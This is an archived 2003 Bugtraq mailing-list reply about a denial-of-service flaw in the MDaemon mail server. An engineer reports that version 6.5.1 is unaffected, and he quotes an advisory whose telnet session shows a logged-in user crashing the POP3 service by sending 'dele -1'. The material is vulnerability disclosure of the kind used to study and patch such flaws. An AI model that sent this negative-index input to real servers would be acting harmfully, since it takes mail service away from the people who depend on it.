RE: MDaemon SMTP/POP/IMAP server: =>6.0.7: POP remote DoS

From: William Pratt (wpratt_at_megapath.net)
Date: 04/29/03

  • Next message: NGSSoftware Insight Security Research: "Oracle Database Server Buffer Overflow Vulnerability (#NISR29042003)" 
    To: "'bugtraq@security.nnov.ru'" <bugtraq@security.nnov.ru>, "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Mon, 28 Apr 2003 15:25:10 -0700

    Tested on 6.5.1 on Win2K Server. Does not crash MDaemon and returns a 'no
    such message' error.

    Sincerely,

    William Pratt
    Unix Systems Engineer
    MegaPath Networks, Inc.
    http://www.megapath.net

    ########################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    ########################################################*
    #Product: MDaemon SMTP/POP/IMAP server =>v.6.0.7
    #Authors: Alt-N Technologies [www.mdaemon.com]
    #Vulnerability: remote DoS via POP3 service
    ########################################################*

    #Overview#-----------------------------------------------------#
    - From help-file:
    "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
    commonplace on UNIX hosts and the Internet to Windows based servers
    and microcomputers. MDaemon is designed to manage the email needs
    of any number of individual users and comes complete with a powerful
    set of integrated tools for managing mail accounts and message
    formats.
    MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
    with LDAP support, an integrated browser-based email client, content
    filtering, spam blockers, extensive security features, and more."

    #Problem#------------------------------------------------------#

    >telnet 127.0.0.1 110

    +OK dark POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
    <MDAEMON-F200303080
    224.AA2418601MD5635@dark>
    user dark
    +OK dark... Recipient ok
    pass ******
    +OK dark@dark's mailbox has 13 total messages (2274775 octets).
    dele -1

    Connection to host lost.

    ...and MDaemon is crashed. This bug (with negative digits) is
    founded in UIDL and DELE commands and it could be used by authorized
    users only.

  • Next message: NGSSoftware Insight Security Research: "Oracle Database Server Buffer Overflow Vulnerability (#NISR29042003)"

    Relevant Pages

    • Re: Another security question/issue.
      ... User Name: MDaemon ... Logon Process: Advapi ... I don't have Mdaemon email service on the server, ...  Caller User Name: MYSERVER-SBS$ ...
      (microsoft.public.windows.server.sbs)
    • MDaemon SMTP/POP/IMAP server =>v.6.7.5: IMAP buffer overflow
      ... "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services ... Remote buffer overflow was found in MDaemon IMAP service. ...
      (Bugtraq)
    • RE: Moving services from NT 4.0 To 2003
      ... I don't think MDaemon is the probelm. ... try to access the server from PC at a remote site. ... I contacted Dell support and everything we have ...
      (microsoft.public.windows.server.migration)
    • IPSec Paketfilter für Mailserver (MDaemon)
      ... Win2000 Server SP4 soll nach außen mit IPSec Paketfiltern ... Leider blocken diese Regeln immer noch die Auflösung der MX/A Einträge des ... Mailservers (MDaemon 6.n). ... Domain über die angegebenen DNS Server aufgelöst werden. ...
      (microsoft.public.de.german.win2000.networking)
    • Re: [SLE] mail migrations
      ... N> I have a mailserver on windows running Mdaemon as the mail server. ... N> access their mails thru imap & not pop, hence the migration is a issue, as ...
      (SuSE)